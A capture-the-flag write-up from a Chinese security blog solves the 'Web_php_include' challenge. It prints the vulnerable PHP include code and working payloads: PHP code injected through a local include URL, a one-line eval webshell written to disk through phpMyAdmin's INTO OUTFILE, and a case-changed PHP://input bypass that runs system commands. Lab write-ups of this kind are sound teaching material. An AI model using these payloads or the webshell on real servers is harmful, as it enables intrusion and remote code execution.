freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

攻防世界web篇之Web_php_include
我是废物 2023-08-17 21:55:15 225098

题目

<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
    $page=str_replace("php://", "", $page);
}
include($page);
?>

hello传值

?page=http://127.0.0.1/?hello=<?php%system("ls");?>
?page=http://127.0.0.1/?hello=<?php%show_source("fl4gisisish3r3.php");?>

phpmyadmin写马

路径扫描能找到phpmyadmin

在这里插入图片描述

账号root 密码为空

==phpmyadmin变量secure_file_priv值为空,说明可以写入一句话木马==

show variables like "secure_file_priv";

在这里插入图片描述

==传成功==

select "<?php eval($_POST[1]); ?>"into outfile '/tmp/1.php'

在这里插入图片描述

==测试==

在这里插入图片描述

大写绕过 PHP://input

==php://input== 可以访问请求的原始数据的只读流, 将post请求中的数据作为PHP代码执行

利用该方法,我们可以直接写入php文件,输入file=php://input,然后使用burp抓包,写入php代码:

<?php system("ls");?>

在这里插入图片描述

# 漏洞分析
本文为 我是废物 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
我是废物 LV.5
这家伙太懒了,还未填写个人描述!
  • 10 文章数
  • 7 关注者
内网穿透(nc)
2023-10-11
【漏洞复现】shiro 反序列化 (CVE-2016-4437)
2023-08-17
【漏洞复现】Windows SMB远程代码执行漏洞(CVE-2020-0796)
2023-08-17
文章目录